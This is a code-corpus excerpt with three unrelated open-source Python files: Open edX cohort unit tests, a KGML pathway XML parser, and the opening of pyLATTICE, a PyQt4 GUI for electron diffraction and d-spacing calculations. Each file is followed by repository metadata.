cohorted=True,
auto_cohort_groups=["AutoGroup"]
)
self.assertEquals(cohorts.get_cohort(user1, course.id).id, cohort.id, "user1 should stay put")
self.assertEquals(cohorts.get_cohort(user2, course.id).name, "AutoGroup", "user2 should be auto-cohorted")
# Now make the auto_cohort_group list empty
config_course_cohorts(
course,
discussions=[],
cohorted=True,
auto_cohort_groups=[]
)
self.assertEquals(
cohorts.get_cohort(user3, course.id).id,
cohorts.get_cohort_by_name(course.id, cohorts.DEFAULT_COHORT_NAME).id,
"No groups->default cohort"
)
# Now set the auto_cohort_group to something different
config_course_cohorts(
course,
discussions=[],
cohorted=True,
auto_cohort_groups=["OtherGroup"]
)
self.assertEquals(
cohorts.get_cohort(user4, course.id).name, "OtherGroup", "New list->new group"
)
self.assertEquals(
cohorts.get_cohort(user1, course.id).name, "TestCohort", "user1 should still be in originally placed cohort"
)
self.assertEquals(
cohorts.get_cohort(user2, course.id).name, "AutoGroup", "user2 should still be in originally placed cohort"
)
self.assertEquals(
cohorts.get_cohort(user3, course.id).name,
cohorts.get_cohort_by_name(course.id, cohorts.DEFAULT_COHORT_NAME).name,
"user3 should still be in the default cohort"
)
def test_auto_cohorting_randomization(self):
"""
Make sure cohorts.get_cohort() randomizes properly.
"""
course = modulestore().get_course(self.toy_course_key)
self.assertFalse(course.is_cohorted)
groups = ["group_{0}".format(n) for n in range(5)]
config_course_cohorts(
course, discussions=[], cohorted=True, auto_cohort_groups=groups
)
# Assign 100 users to cohorts
for i in range(100):
user = UserFactory(
username="test_{0}".format(i),
email="a@b{0}.com".format(i)
)
cohorts.get_cohort(user, course.id)
# Now make sure that the assignment was at least vaguely random:
# each cohort should have at least 1, and fewer than 50 students.
# (with 5 groups, probability of 0 users in any group is about
# .8**100= 2.0e-10)
for cohort_name in groups:
cohort = cohorts.get_cohort_by_name(course.id, cohort_name)
num_users = cohort.users.count()
self.assertGreater(num_users, 1)
self.assertLess(num_users, 50)
def test_get_course_cohorts_noop(self):
"""
Tests get_course_cohorts returns an empty list when no cohorts exist.
"""
course = modulestore().get_course(self.toy_course_key)
config_course_cohorts(course, [], cohorted=True)
self.assertEqual([], cohorts.get_course_cohorts(course))
def test_get_course_cohorts(self):
"""
Tests that get_course_cohorts returns all cohorts, including auto cohorts.
"""
course = modulestore().get_course(self.toy_course_key)
config_course_cohorts(
course, [], cohorted=True,
auto_cohort_groups=["AutoGroup1", "AutoGroup2"]
)
# add manual cohorts to course 1
CohortFactory(course_id=course.id, name="ManualCohort")
CohortFactory(course_id=course.id, name="ManualCohort2")
cohort_set = {c.name for c in cohorts.get_course_cohorts(course)}
self.assertEqual(cohort_set, {"AutoGroup1", "AutoGroup2", "ManualCohort", "ManualCohort2"})
def test_is_commentable_cohorted(self):
course = modulestore().get_course(self.toy_course_key)
self.assertFalse(course.is_cohorted)
def to_id(name):
return topic_name_to_id(course, name)
# no topics
self.assertFalse(
cohorts.is_commentable_cohorted(course.id, to_id("General")),
"Course doesn't even have a 'General' topic"
)
# not cohorted
config_course_cohorts(course, ["General", "Feedback"], cohorted=False)
self.assertFalse(
cohorts.is_commentable_cohorted(course.id, to_id("General")),
"Course isn't cohorted"
)
# cohorted, but top level topics aren't
config_course_cohorts(course, ["General", "Feedback"], cohorted=True)
self.assertTrue(course.is_cohorted)
self.assertFalse(
cohorts.is_commentable_cohorted(course.id, to_id("General")),
"Course is cohorted, but 'General' isn't."
)
self.assertTrue(
cohorts.is_commentable_cohorted(course.id, to_id("random")),
"Non-top-level discussion is always cohorted in cohorted courses."
)
# cohorted, including "Feedback" top-level topics aren't
config_course_cohorts(
course, ["General", "Feedback"],
cohorted=True,
cohorted_discussions=["Feedback"]
)
self.assertTrue(course.is_cohorted)
self.assertFalse(
cohorts.is_commentable_cohorted(course.id, to_id("General")),
"Course is cohorted, but 'General' isn't."
)
self.assertTrue(
cohorts.is_commentable_cohorted(course.id, to_id("Feedback")),
"Feedback was listed as cohorted. Should be."
)
def test_get_cohorted_commentables(self):
"""
Make sure cohorts.get_cohorted_commentables() correctly returns a list of strings representing cohorted
commentables. Also verify that we can't get the cohorted commentables from a course which does not exist.
"""
course = modulestore().get_course(self.toy_course_key)
self.assertEqual(cohorts.get_cohorted_commentables(course.id), set())
config_course_cohorts(course, [], cohorted=True)
self.assertEqual(cohorts.get_cohorted_commentables(course.id), set())
config_course_cohorts(
course, ["General", "Feedback"],
cohorted=True,
cohorted_discussions=["Feedback"]
)
self.assertItemsEqual(
cohorts.get_cohorted_commentables(course.id),
set([topic_name_to_id(course, "Feedback")])
)
config_course_cohorts(
course, ["General", "Feedback"],
cohorted=True,
cohorted_discussions=["General", "Feedback"]
)
self.assertItemsEqual(
cohorts.get_cohorted_commentables(course.id),
set([topic_name_to_id(course, "General"), topic_name_to_id(course, "Feedback")])
)
self.assertRaises(
Http404,
lambda: cohorts.get_cohorted_commentables(SlashSeparatedCourseKey("course", "does_not", "exist"))
)
def test_get_cohort_by_name(self):
"""
Make sure cohorts.get_cohort_by_name() properly finds a cohort by name for a given course. Also verify that it
raises an error when the cohort is not found.
"""
course = modulestore().get_course(self.toy_course_key)
self.assertRaises(
CourseUserGroup.DoesNotExist,
lambda: cohorts.get_cohort_by_name(course.id, "CohortDoesNotExist")
)
cohort = CohortFactory(course_id=course.id, name="MyCohort")
self.assertEqual(cohorts.get_cohort_by_name(course.id, "MyCohort"), cohort)
self.assertRaises(
CourseUserGroup.DoesNotExist,
lambda: cohorts.get_cohort_by_name(SlashSeparatedCourseKey("course", "does_not", "exist"), cohort)
)
def test_get_cohort_by_id(self):
"""
Make sure cohorts.get_cohort_by_id() properly finds a cohort by id for a given
course.
"""
course = modulestore().get_course(self.toy_course_key)
cohort = CohortFactory(course_id=course.id, name="MyCohort")
self.assertEqual(cohorts.get_cohort_by_id(course.id, cohort.id), cohort)
cohort.delete()
self.assertRaises(
CourseUserGroup.DoesNotExist,
lambda: cohorts.get_cohort_by_id(course.id, cohort.id)
)
@patch("course_groups.cohorts.tracker")
def test_add_cohort(self, mock_tracker):
"""
Make sure cohorts.add_cohort() properly adds a cohort to a course and handles
errors.
"""
course = modulestore().get_course(self.toy_course_key)
added_cohort = cohorts.add_cohort(course.id, "My Cohort")
mock_tracker.emit.assert_any_call(
"edx.cohort.creation_requested",
{"cohort_name": added_cohort.name, "cohort_id": added_cohort.id}
)
self.assertEqual(added_cohort.name, "My Cohort")
self.assertRaises(
ValueError,
lambda: cohorts.add_cohort(course.id, "My Cohort")
)
self.assertRaises(
ValueError,
lambda: cohorts.add_cohort(SlashSeparatedCourseKey("course", "does_not", "exist"), "My Cohort")
)
@patch("course_groups.cohorts.tracker")
def test_add_user_to_cohort(self, mock_tracker):
"""
Make sure cohorts.add_user_to_cohort() properly adds a user to a cohort and
handles errors.
"""
course_user = UserFactory(username="Username", email="a@b.com")
UserFactory(username="RandomUsername", email="b@b.com")
course = modulestore().get_course(self.toy_course_key)
CourseEnrollment.enroll(course_user, self.toy_course_key)
first_cohort = CohortFactory(course_id=course.id, name="FirstCohort")
second_cohort = CohortFactory(course_id=course.id, name="SecondCohort")
# Success cases
# We shouldn't get back a previous cohort, since the user wasn't in one
self.assertEqual(
cohorts.add_user_to_cohort(first_cohort, "Username"),
(course_user, None)
)
mock_tracker.emit.assert_any_call(
"edx.cohort.user_add_requested",
{
"user_id": course_user.id,
"cohort_id": first_cohort.id,
"cohort_name": first_cohort.name,
"previous_cohort_id": None,
"previous_cohort_name": None,
}
)
# Should get (user, previous_cohort_name) when moved from one cohort to
# another
self.assertEqual(
cohorts.add_user_to_cohort(second_cohort, "Username"),
(course_user, "FirstCohort")
)
mock_tracker.emit.assert_any_call(
"edx.cohort.user_add_requested",
{
"user_id": course_user.id,
"cohort_id": second_cohort.id,
"cohort_name": second_cohort.name,
"previous_cohort_id": first_cohort.id,
"previous_cohort_name": first_cohort.name,
}
)
# Error cases
# Should get ValueError if user already in cohort
self.assertRaises(
ValueError,
lambda: cohorts.add_user_to_cohort(second_cohort, "Username")
)
# UserDoesNotExist if user truly does not exist
self.assertRaises(
User.DoesNotExist,
lambda: cohorts.add_user_to_cohort(first_cohort, "non_existent_username")
)
| agpl-3.0 | -5,519,821,087,430,878,000 | 36.36773 | 120 | 0.608375 | false |
widdowquinn/KGML KGML_parser.py 1 7550
# (c) The James Hutton Institute 2013
# Author: Leighton Pritchard
#
# Contact:
# leighton.pritchard@hutton.ac.uk
#
# Leighton Pritchard,
# Information and Computing Sciences,
# James Hutton Institute,
# Errol Road,
# Invergowrie,
# Dundee,
# DD6 9LH,
# Scotland,
# UK
#
# The MIT License
#
# Copyright (c) 2010-2014 The James Hutton Institute
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
""" This module provides classes and functions to parse a KGML pathway map
The KGML pathway map is parsed into the object structure defined in
KGML_pathway.py in this module.
Classes
KGMLParser Parses KGML file
Functions
read Returns a single Pathway object, using KGMLParser
internally
"""
from KGML_pathway import *
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
try:
import xml.etree.cElementTree as ElementTree
except ImportError:
import xml.etree.ElementTree as ElementTree
def read(handle, debug=0):
""" Returns a single Pathway object. There should be one and only
one pathway in each file, but there may well be pathological
examples out there.
"""
iterator = parse(handle, debug)
try:
first = iterator.next()
except StopIteration:
first = None
if first is None:
raise ValueError("No pathways found in handle")
try:
second = iterator.next()
except StopIteration:
second = None
if second is not None:
raise ValueError("More than one pathway found in handle")
return first
def parse(handle, debug=0):
""" Returns an iterator over Pathway elements
handle file handle to a KGML file for parsing
debug integer for amount of debug information
to print
This is a generator for the return of multiple Pathway objects.
"""
# Check handle
if not hasattr(handle, 'read'):
if isinstance(handle, str):
handle = StringIO(handle)
else:
exc_txt = "An XML-containing handle or an XML string " +\
"must be provided"
raise Exception(exc_txt)
# Parse XML and return each Pathway
for event, elem in \
ElementTree.iterparse(handle, events=('start', 'end')):
if event == "end" and elem.tag == "pathway":
yield KGMLParser(elem).parse()
elem.clear()
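# Usage sketch (the file name is illustrative):
#   for pathway in parse(open('kegg_maps.xml', 'rU')):
#       print pathway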
class KGMLParser(object):
""" Parse a KGML XML Pathway entry into a Pathway object
"""
def __init__(self, elem):
self.entry = elem
def parse(self):
""" Parse the input elements
"""
def _parse_pathway(attrib):
for k, v in attrib.items():
self.pathway.__setattr__(k, v)
def _parse_entry(element):
new_entry = Entry()
for k, v in element.attrib.items():
new_entry.__setattr__(k, v)
for subelement in element.getchildren():
if subelement.tag == 'graphics':
_parse_graphics(subelement, new_entry)
elif subelement.tag == 'component':
_parse_component(subelement, new_entry)
self.pathway.add_entry(new_entry)
def _parse_graphics(element, entry):
new_graphics = Graphics(entry)
for k, v in element.attrib.items():
new_graphics.__setattr__(k, v)
entry.add_graphics(new_graphics)
def _parse_component(element, entry):
new_component = Component(entry)
for k, v in element.attrib.items():
new_component.__setattr__(k, v)
entry.add_component(new_component)
def _parse_reaction(element):
new_reaction = Reaction()
for k, v in element.attrib.items():
new_reaction.__setattr__(k, v)
for subelement in element.getchildren():
if subelement.tag == 'substrate':
new_reaction.add_substrate(int(subelement.attrib['id']))
elif subelement.tag == 'product':
new_reaction.add_product(int(subelement.attrib['id']))
self.pathway.add_reaction(new_reaction)
def _parse_relation(element):
new_relation = Relation()
new_relation.entry1 = int(element.attrib['entry1'])
new_relation.entry2 = int(element.attrib['entry2'])
new_relation.type = element.attrib['type']
for subtype in element.getchildren():
name, value = subtype.attrib['name'], subtype.attrib['value']
if name in ('compound', 'hidden compound'):
new_relation.subtypes.append((name, int(value)))
else:
new_relation.subtypes.append((name, value))
self.pathway.add_relation(new_relation)
#==========#
# Initialise Pathway
self.pathway = Pathway()
# Get information about the pathway itself
_parse_pathway(self.entry.attrib)
for element in self.entry.getchildren():
if element.tag == 'entry':
_parse_entry(element)
elif element.tag == 'reaction':
_parse_reaction(element)
elif element.tag == 'relation':
_parse_relation(element)
# Parsing of some elements not implemented - no examples yet
else:
# This should warn us of any unimplemented tags
print "Warning: tag %s not implemented in parser" % element.tag
return self.pathway
if __name__ == '__main__':
# Check large metabolism
pathway = read(open('ko01100.xml', 'rU'))
print pathway
for k, v in pathway.entries.items()[:20]:
print v
for r in pathway.reactions[:20]:
print r
print len(pathway.maps)
# Check relations
pathway = read(open('ko_metabolic/ko00010.xml', 'rU'))
print pathway
for k, v in pathway.entries.items()[:20]:
print v
for r in pathway.reactions[:20]:
print r
for r in pathway.relations[:20]:
print r
print len(pathway.maps)
# Check components
pathway = read(open('ko_metabolic/ko00253.xml', 'rU'))
print pathway
for k, v in pathway.entries.items():
print v
print len(pathway.maps)
# Test XML representation
print pathway.get_KGML()
# Test bounds of pathway
print pathway.bounds
| mit | 7,659,131,650,805,647,000 | 33.318182 | 79 | 0.61298 | false |
eegroopm/pyLATTICE gui/pyLATTICE.py 1 74321
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
pyLATTICE is a PyQt4 GUI for simulating electron diffraction patterns and
computing d-spacings and metric tensors for arbitrary crystal lattices.
"""
from __future__ import division #necessary for python2
from __future__ import unicode_literals
# define authorship information
__authors__ = ['Evan Groopman', 'Thomas Bernatowicz']
__author__ = ','.join(__authors__)
__credits__ = []
__copyright__ = 'Copyright (c) 2011-2014'
__license__ = 'GPL'
# maintanence information
__maintainer__ = 'Evan Groopman'
__email__ = 'eegroopm@gmail.com'
"""
Created on Wed Apr 11 14:46:56 2012
@author: Evan Groopman
"""
#Main imports
from PyQt4 import QtCore, QtGui, uic
import os, sys
import numpy as np
import pandas as pd
import re
#Matplotlib imports
import matplotlib as mpl
mpl.use('Qt4Agg')
from matplotlib.backends.backend_qt4agg import NavigationToolbar2QTAgg as NavigationToolbar
# Local files in the resource directory
import gui
from resources.TableWidget import TableWidget
from resources.Diffraction import Diffraction
#from resources.pyqtresizer import logit,slResizer,Resizer
from resources.IPythonConsole import IPythonConsole
from resources.common import common
from resources.matplotlibwidget import matplotlibWidget
from resources.Dialogs import (MineralListDialog, NewMineralDialog,
ManualConditionsDialog, SettingsDialog)
try:
from resources.dspace import DSpace
print('Importing compiled "DSpace"')
except ImportError as error:
# Attempt autocompilation.
import pyximport
pyximport.install()
from resources._dspace import DSpace
print('Building "DSpace"')
try:
from resources.diffspot import CalcSpots, CalcSpotsHCP
print('Importing compiled "DiffSpot"')
except ImportError as error:
# Attempt autocompilation.
import pyximport
pyximport.install()
from resources._diffspot import CalcSpots, CalcSpotsHCP
print('Building "DiffSpot"')
#need different compiled versions of Cython modules depending on python version
#if sys.version_info[0] == 3:
# #from resources.dspace import DSpace#Cython function for calculating d-spaces
# #from resources.diffspot import CalcSpots, CalcSpotsHCP#Cython function for calculating diffraction spot coordinates
# from resources.pyqtresizer import logit,slResizer,Resizer
#elif sys.version_info[0] == 2:
# #from resources.dspace_py2 import DSpace#Cython function for calculating d-spaces
# #from resources.diffspot_py2 import CalcSpots, CalcSpotsHCP#Cython function for calculating diffraction spot coordinates
# from resources.pyqtresizer_py2 import logit,slResizer,Resizer
#from Wulff_net import WULFF
#dealing with unicode characters in windows, which breaks compiled linux rendering
if sys.platform == 'win32':
mpl.rc('font', **{'sans-serif' : 'Arial Unicode MS','family' : 'sans-serif'})
#elif sys.platform == 'linux':# and os.path.isfile('pyLATTICE'): #on linux AND executable file exists. Does nothing if running from source
# print('Adjusting font')
# mpl.rc('font',**{'sans-serif' : 'Bitstream Vera Sans','family' : 'sans-serif'})
#use LaTeX to render symbols
#plt.rc('text', usetex=True)
mpl.rcParams['mathtext.default'] = 'regular'
#mpl.rcParams['text.latex.preamble'] = [r'\usepackage{textcomp}']
#mpl.rcParams['text.latex.unicode'] = True
#Other
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
################################################################################
## Gui file ##
# Set up window
class pyLATTICE_GUI(QtGui.QMainWindow):
def __init__(self, parent=None):
super(pyLATTICE_GUI, self).__init__(parent)
# load the ui
gui.loadUi(__file__,self)
self.version = gui.__version__
self._grabCommon()
self.Diffraction = Diffraction()
self.DiffWidget = matplotlibWidget(self.common,self.Diffraction) #mplwidget can access common data
#self.DiffWidget.setStyleSheet("font-family: 'Arial Unicode MS', Arial, sans-serif; font-size: 15px;")
self.verticalLayout.addWidget(self.DiffWidget)
self.DiffWidget.distances.connect(self.on_distances_sent)
#self.DiffWidget = self.MplWidget
self.Plot = self.DiffWidget.canvas.ax
self.Plot.axis('equal') #locks aspect ratio 1:1, even when zooming
#matplotlibWidget.setupToolbar(self.DiffWidget.canvas, self.DiffTab)
# Create the navigation toolbar, tied to the canvas
self.mpl_toolbar = NavigationToolbar(self.DiffWidget.canvas, self.DiffTab)
#add widgets to toolbar
self.comboBox_rotate = QtGui.QComboBox()
self.checkBox_labels = QtGui.QCheckBox("Labels")
self.checkBox_labels.setChecked(True)
self.mpl_toolbar.addWidget(self.comboBox_rotate)
self.mpl_toolbar.addWidget(self.checkBox_labels)
#add toolbar to tabs
self.verticalLayout.addWidget(self.mpl_toolbar)
#Plot initial zero spot
self.Plot.plot(0,0, linestyle = '', marker='o', markersize = 10, color = 'black')
self.Plot.set_xlim([-5,5])
self.Plot.set_ylim([-5,5])
#self.Plot.annotate('0 0 0', xy = (0,0), xytext=(0,10),textcoords = 'offset points', ha = 'center', va = 'bottom',
#bbox = dict(boxstyle = 'round,pad=0.5', fc = 'yellow', alpha = 0.01))
#Initialize Metric tensor Tables
self.Gtable_size = (200,200)
self.Gtable = TableWidget()
self.G_inv_table = TableWidget()
self.tensorlayout.addWidget(self.Gtable,2,0) #third row, first column
self.tensorlayout.addWidget(self.G_inv_table,2,1)
self.Gtable.resize(self.Gtable_size[0],self.Gtable_size[1])
self.G_inv_table.resize(self.Gtable_size[0],self.Gtable_size[1])
self.Gtable.setData(np.eye(3))
self.G_inv_table.setData(np.eye(3))
for i in range(3):
self.Gtable.setColumnWidth(i,self.Gtable_size[0]/4)
self.Gtable.setRowHeight(i,self.Gtable_size[1]/3.5)
self.G_inv_table.setColumnWidth(i,self.Gtable_size[0]/3.35)
self.G_inv_table.setRowHeight(i,self.Gtable_size[1]/3.5)
self.a = 1; self.b=1; self.c=1
#Initialize parameter tables
self.param_table_size = (200,200)
self.Gparam_table = TableWidget()
self.Gparam_inv_table = TableWidget()
self.Gparam_table.resize(self.param_table_size[0],self.param_table_size[1])
self.Gparam_inv_table.resize(self.param_table_size[0],self.param_table_size[1])
initdat = np.transpose(np.array([[1,1,1,90,90,90]]))
self.Gparam_table.setData(initdat)
self.Gparam_inv_table.setData(initdat)
self.Gparam_table.setHorizontalHeaderLabels(['Parameters'])
self.Gparam_inv_table.setHorizontalHeaderLabels(['Parameters'])
self.Gparam_table.setVerticalHeaderLabels([u'a',u'b',u'c',u'\u03B1',u'\u03B2',u'\u03B3'])
self.Gparam_inv_table.setVerticalHeaderLabels([u'a*',u'b*',u'c*',u'\u03B1*',u'\u03B2*',u'\u03B3*'])
self.tensorlayout.addWidget(self.Gparam_table,3,0)
self.tensorlayout.addWidget(self.Gparam_inv_table,3,1)
for i in range(0,6):
self.Gparam_table.setColumnWidth(i,self.param_table_size[0])
self.Gparam_table.setRowHeight(i,self.param_table_size[0]/6.7)
self.Gparam_inv_table.setColumnWidth(i,self.param_table_size[0])
self.Gparam_inv_table.setRowHeight(i,self.param_table_size[0]/6.7)
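        # For reference (standard crystallography, not taken from this file):
        # the direct metric tensor G displayed in Gtable is built from the
        # lattice parameters (angles in radians) as
        #   G = [[a*a,            a*b*cos(gamma), a*c*cos(beta)],
        #        [a*b*cos(gamma), b*b,            b*c*cos(alpha)],
        #        [a*c*cos(beta),  b*c*cos(alpha), c*c]]
        # and the reciprocal metric tensor shown next to it is inv(G).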
#D-spacing table
self.dspace_table_size = (400,630)
self.dspace_table = TableWidget()
self.dspace_table.resize(self.dspace_table_size[0],self.dspace_table_size[1])
self.dspace_table.setData(np.array([[0,0,0,0]]))
self.dspace_table.setHorizontalHeaderLabels(['d-space','h','k','l'])
self.dspacelayout.addWidget(self.dspace_table)
self.dspace_table.setColumnWidth(0,80)
for i in range(1,4):
self.dspace_table.setColumnWidth(i,50)
# Set miller indices
self.miller_indices = [str(x) for x in range(-6,7)]
self.comboBox_hmin.addItems(self.miller_indices)
self.comboBox_kmin.addItems(self.miller_indices)
self.comboBox_lmin.addItems(self.miller_indices)
self.comboBox_hmin.setCurrentIndex(4)
self.comboBox_kmin.setCurrentIndex(4)
self.comboBox_lmin.setCurrentIndex(4)
# Miller max indices set to be 1 greater than selected min index
self.comboBox_hmax.addItems(self.miller_indices)
self.comboBox_kmax.addItems(self.miller_indices)
self.comboBox_lmax.addItems(self.miller_indices)
#self.setMillerMax_h()
#self.setMillerMax_k()
#self.setMillerMax_l()
self.comboBox_hmax.setCurrentIndex(8)
self.comboBox_kmax.setCurrentIndex(8)
self.comboBox_lmax.setCurrentIndex(8)
#Set zone axis parameters
#by default set as [0 0 1]
zone_indices = [str(x) for x in range(-5,6)]
self.comboBox_u.addItems(zone_indices)
self.comboBox_v.addItems(zone_indices)
self.comboBox_w.addItems(zone_indices)
self.comboBox_u.setCurrentIndex(5)
self.comboBox_v.setCurrentIndex(5)
self.comboBox_w.setCurrentIndex(6)
#set calculator comboboxes
self.comboBox_h1.addItems(self.miller_indices)
self.comboBox_h2.addItems(self.miller_indices)
self.comboBox_k1.addItems(self.miller_indices)
self.comboBox_k2.addItems(self.miller_indices)
self.comboBox_l1.addItems(self.miller_indices)
self.comboBox_l2.addItems(self.miller_indices)
self.comboBox_h1.setCurrentIndex(7)
self.comboBox_h2.setCurrentIndex(8)
self.comboBox_k1.setCurrentIndex(6)
self.comboBox_k2.setCurrentIndex(6)
self.comboBox_l1.setCurrentIndex(6)
self.comboBox_l2.setCurrentIndex(6)
#Initialize mineral database combobox
self.setMineralList()
#Initialize rotation of diffraction pattern.
#Will only offer 0,90,180,270 degrees
rotate_items = ['-180','-150','-120','-90','-60','-30','0','30','60','90','120','150','180']
self.comboBox_rotate.addItems(rotate_items)
self.comboBox_rotate.setCurrentIndex(6) #zero by default
#get values in energy, cam length, cam const. combo boxes
self.spinBox_beamenergy.setValue(int(self.common.beamenergy))
self.spinBox_camlength.setValue(int(self.common.camlength))
self.doubleSpinBox_camconst.setValue(self.common.camconst)
#Initialize signals and slots
#This needs to go here after setting Miller indices
#When initializing, it runs Recalculate to do metric tensor and d-spacings
#must go before setting crystal types, but after setting all of the combo boxes
#combo boxes recalculate each time their index changes once the signals/slots set up
#if signals/slots placed before, will recalc d-spacings every time you initialize a combobox value
self.signals_slots()
# Set crystal type combo box items:
self.crystaltypes = ['Cubic','Tetragonal','Orthorhombic','Trigonal', 'Hexagonal','Monoclinic','Triclinic']
self.comboBox_crystaltype.addItems(self.crystaltypes)
#Redo some labels in unicode/greek characters
self.label_alpha.setText(u'\u03B1')
self.label_beta.setText(u'\u03B2')
self.label_gamma.setText(u'\u03B3')
self.label_dist_recip.setText(u'Reciprocal Distance (\u212B\u207B\u00B9 )')
self.label_dist_real.setText(u'Real Distance (\u212B)')
self.label_dist_film.setText(u'Film Distance (cm)')
self.label_angle.setText(u'Angle (\u00B0)')
v = self.version.split('.')
pv = v[0] + '.' + v[1] #only major/minor versions. not bugfixes
self.label_pyLATTICE.setText(u'pyLATTICE %s' % pv)
#initialize popup IPython console
#can interact with specific data
self._initIPython(self.common)
def _grabCommon(self):
"""Get all common variables."""
self.common = common()
self._overline_strings = self.common._overline_strings
self.DSpaces = self.common.DSpaces
self.ZoneAxis = self.common.ZoneAxis
self.u = self.common.u
self.v = self.common.v
self.w = self.common.w
#lattice parameters and angles
self.a = self.common.a
self.b = self.common.b
self.c = self.common.c
self.astar = self.common.astar
self.bstar = self.common.bstar
self.cstar = self.common.cstar
self.alpha = self.common.alpha
self.beta = self.common.beta
self.gamma = self.common.gamma
self.alphastar = self.common.alphastar
self.betastar = self.common.betastar
self.gammastar = self.common.gammastar
#TEM params
self.beamenergy = self.common.beamenergy
self.camlength = self.common.camlength
self.camconst = self.common.camconst
self.wavelength = self.common.wavelength
#SpaceGroup data
self.sg = self.common.sg
self.sghex = self.common.sghex
self.mineraldb = self.common.mineraldb
self.manualConds = self.common.manualConds #manual space group conditions
def updateCommon(self):
"""Update all of the common variables and push these to the IPython console"""
self.common.DSpaces = self.DSpaces
self.common.ZoneAxis = self.ZoneAxis
self.common.u = self.u
self.common.v = self.v
self.common.w = self.w
self.common.a = self.a
self.common.b = self.b
self.common.c = self.c
self.common.astar = self.astar
self.common.bstar = self.bstar
self.common.cstar = self.cstar
self.common.alpha = self.alpha
self.common.beta = self.beta
self.common.gamma = self.gamma
self.common.alphastar = self.alphastar
self.common.betastar = self.betastar
self.common.gammastar = self.gammastar
#mineral database and manual conditions
#self.mineraldb = self.common.mineraldb
self.common.manualConds = self.manualConds #manual space group conditions
self.common.beamenergy = self.beamenergy = self.spinBox_beamenergy.value()
self.common.camlength = self.camlength = self.spinBox_camlength.value()
self.common.camconst = self.camconst = self.doubleSpinBox_camconst.value()
self.common.wavelength = self.wavelength = self.common.Wavelength(self.beamenergy)
self.updateIPY(self.common)
@QtCore.pyqtSlot(str,str,str,str)
def on_distances_sent(self,recip_d, real_d, film_d, angle):
self.lineEdit_recip_2.setText(recip_d)
self.lineEdit_real_2.setText(real_d)
self.lineEdit_film_2.setText(film_d)
self.lineEdit_angle_3.setText(angle)
def Recalculate(self):
"""Run MetricTensor() and D_Spacigns(). For use when slider hasn't changed"""
self.MetricTensor()
self.D_Spacings()
def ReplotDiffraction(self):
self.Recalculate()
try:
self.PlotDiffraction()
except UnboundLocalError:
pass
# def Print(self):
# """test print fn"""
# print(self.comboBox_spacegroup.currentIndex())
def signals_slots(self):
"""All of the signals and slots not in .ui file"""
#Testing
#QtCore.QObject.connect(self.command_Wulff, QtCore.SIGNAL(_fromUtf8("clicked()")),WULFF)
### Menu actions
QtCore.QObject.connect(self.actionClose, QtCore.SIGNAL(_fromUtf8("triggered()")), self.close)
QtCore.QObject.connect(self.actionAbout, QtCore.SIGNAL(_fromUtf8("triggered()")), self.About)
QtCore.QObject.connect(self.actionHow_to, QtCore.SIGNAL(_fromUtf8("triggered()")), self.HowTo)
QtCore.QObject.connect(self.actionSave_D_spacings, QtCore.SIGNAL(_fromUtf8("triggered()")), self.SaveDSpace)
QtCore.QObject.connect(self.actionRemove_DB_Minerals, QtCore.SIGNAL(_fromUtf8("triggered()")), self.removeMinerals)
QtCore.QObject.connect(self.actionSave_Mineral_Database, QtCore.SIGNAL(_fromUtf8("triggered()")), self.SaveMineralDB)
QtCore.QObject.connect(self.actionLoad_Mineral_Database, QtCore.SIGNAL(_fromUtf8("triggered()")), self.LoadMineralDB)
QtCore.QObject.connect(self.actionAppendMineral, QtCore.SIGNAL(_fromUtf8("triggered()")), self.AppendMineral)
QtCore.QObject.connect(self.actionIPython_Console, QtCore.SIGNAL(_fromUtf8("triggered()")), self.IPY)
QtCore.QObject.connect(self.actionManualCond, QtCore.SIGNAL(_fromUtf8("triggered()")), self.ManualConditions)
QtCore.QObject.connect(self.actionSettings, QtCore.SIGNAL(_fromUtf8("triggered()")), self.setSettings)
### Command buttons
QtCore.QObject.connect(self.command_Plot, QtCore.SIGNAL(_fromUtf8("clicked()")),self.PlotDiffraction)
QtCore.QObject.connect(self.command_recalculate, QtCore.SIGNAL(_fromUtf8("clicked()")),self.Recalculate)
#QtCore.QObject.connect(self.command_Wulff, QtCore.SIGNAL(_fromUtf8("clicked()")),self.updateIPY)
### crystal and cell type actions
QtCore.QObject.connect(self.comboBox_crystaltype, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(QString)")), self.setCellType)
QtCore.QObject.connect(self.comboBox_celltype, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(QString)")), self.setConditions)
QtCore.QObject.connect(self.spinBox_spacegroup, QtCore.SIGNAL(_fromUtf8("valueChanged(int)")), self.SpaceGroupLookup)
QtCore.QObject.connect(self.checkBox_obverse, QtCore.SIGNAL(_fromUtf8("toggled(bool)")), self.D_Spacings)
QtCore.QObject.connect(self.comboBox_mineraldb, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(QString)")), self.setMineral)
#QtCore.QObject.connect(self.comboBox_spacegroup, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(QString)")), self.D_Spacings)
### Navigation Toolbar buttons
QtCore.QObject.connect(self.comboBox_rotate, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.PlotDiffraction)
QtCore.QObject.connect(self.checkBox_labels, QtCore.SIGNAL(_fromUtf8("toggled(bool)")), self.PlotDiffraction) #labels checkbox
### Checkboxes and Miller indices
QtCore.QObject.connect(self.checkBox_samemin, QtCore.SIGNAL(_fromUtf8("toggled(bool)")), self.sameMin)
